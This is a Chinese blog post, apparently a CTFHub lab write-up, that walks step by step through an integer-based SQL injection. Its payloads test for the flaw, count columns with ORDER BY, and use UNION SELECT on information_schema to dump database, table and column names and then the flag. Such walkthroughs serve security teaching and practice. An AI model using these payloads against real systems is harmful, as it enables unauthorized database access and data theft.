当前位置:首页 » 《休闲阅读》 » 正文

CTFHUB_web_sql整数型注入_JYSNkai的博客

4 人参与  2022年01月02日 16:15  分类 : 《休闲阅读》  评论

点击全文阅读


 

手动解题步骤

1. 检查是否存在注入

and 1=1 #返回正确  
and 1=2 #返回错误

 

 存在

2. 猜字段数 得出字段数

1 order by 1
1 order by 2
1 order by 3

 

可以看出存在俩个字段

3. 爆数据库名

-1 union select user(),database()

## -1是为了前面部分查询无结果,从而显示后面union的查询结果

 得到数据库名称sqli

4. 爆表名

-1 union select 999,group_concat(table_name)from information_schema.tables where table_schema='sqli'

 得到表名 news,flag

5. 爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

 得到字段名flag

6. 获得flag

-1 union select 1,group_concat(flag) from sqli.flag

 

 


点击全文阅读


本文链接:http://zhangshiyu.com/post/32552.html

字段  返回  数据库  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 《被资助的贫困男友灭门后,我杀疯了》小说章节列表免费试读,陈少陈川沈媛小说在线阅读
  • 完结版《相亲对象说自己没谈过恋爱,但她的人流手术是我做的》章节阅读
  • 完结版《生日前一天,丈夫送我蓝宝石戒指》章节目录在线阅读
  • 小说《凤凰一族死气缠身》章节免费阅读
  • 千金女友的爱情游戏小说,千金女友的爱情游戏章节在线阅读
  • 在线寻找天命凤凰当众虐待凌辱我,至尊金龙宝杀疯了小说的无删减版本
  • 京圈太子爷吃了我的情蛊后小说完结版章节免费阅读
  • 《闪婚最强军爷,被宠上天》小说大结局免费试读 荀桉眠傅时樾小说
  • 穿书:开局,睁眼就是失身现场小说最新更新在哪里?免费在线看
  • 结婚纪念日,我视为光的老公出轨了小说最新章节在哪里可以读到?
  • 小说《世子,二当家她只想借你生个崽》章节免费阅读
  • 重生后,我带着炮灰配角们一起发疯姜花杉沈归灵,重生后,我带着炮灰配角们一起发疯章节在线阅读

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1